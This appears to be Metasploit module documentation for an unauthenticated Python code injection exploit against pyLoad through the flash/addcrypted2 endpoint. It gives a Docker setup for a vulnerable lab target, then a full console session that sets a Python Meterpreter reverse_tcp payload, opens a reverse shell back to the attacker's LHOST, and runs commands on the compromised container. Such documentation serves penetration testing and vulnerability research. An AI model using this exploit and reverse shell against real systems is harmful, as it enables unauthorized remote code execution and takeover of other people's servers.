documentation/modules/exploit/linux/http/pyload_js2py_exec.md
pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services, the primary of which is on port 8000 and can not be used by external hosts. A secondary "Click 'N' Load" service runs on port 9666 and can be used remotely without authentication.
use exploit/linux/http/pyload_js2py_execRHOST, PAYLOAD and payload associated optionsrundocker run -d \
--name=pyload-ng \
-e PUID=1000 \
-e PGID=1000 \
-e TZ=Etc/UTC \
-p 8000:8000 \
-p 9666:9666 \
--restart unless-stopped \
lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30
msf > use exploit/linux/http/pyload_js2py_exec
[*] Using configured payload cmd/unix/generic
msf exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf exploit(linux/http/pyload_js2py_exec) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (24380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500
meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer : f03ec089a4fe
OS : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023
Architecture : x64
Meterpreter : python/linux
meterpreter > pwd
/config/data
meterpreter >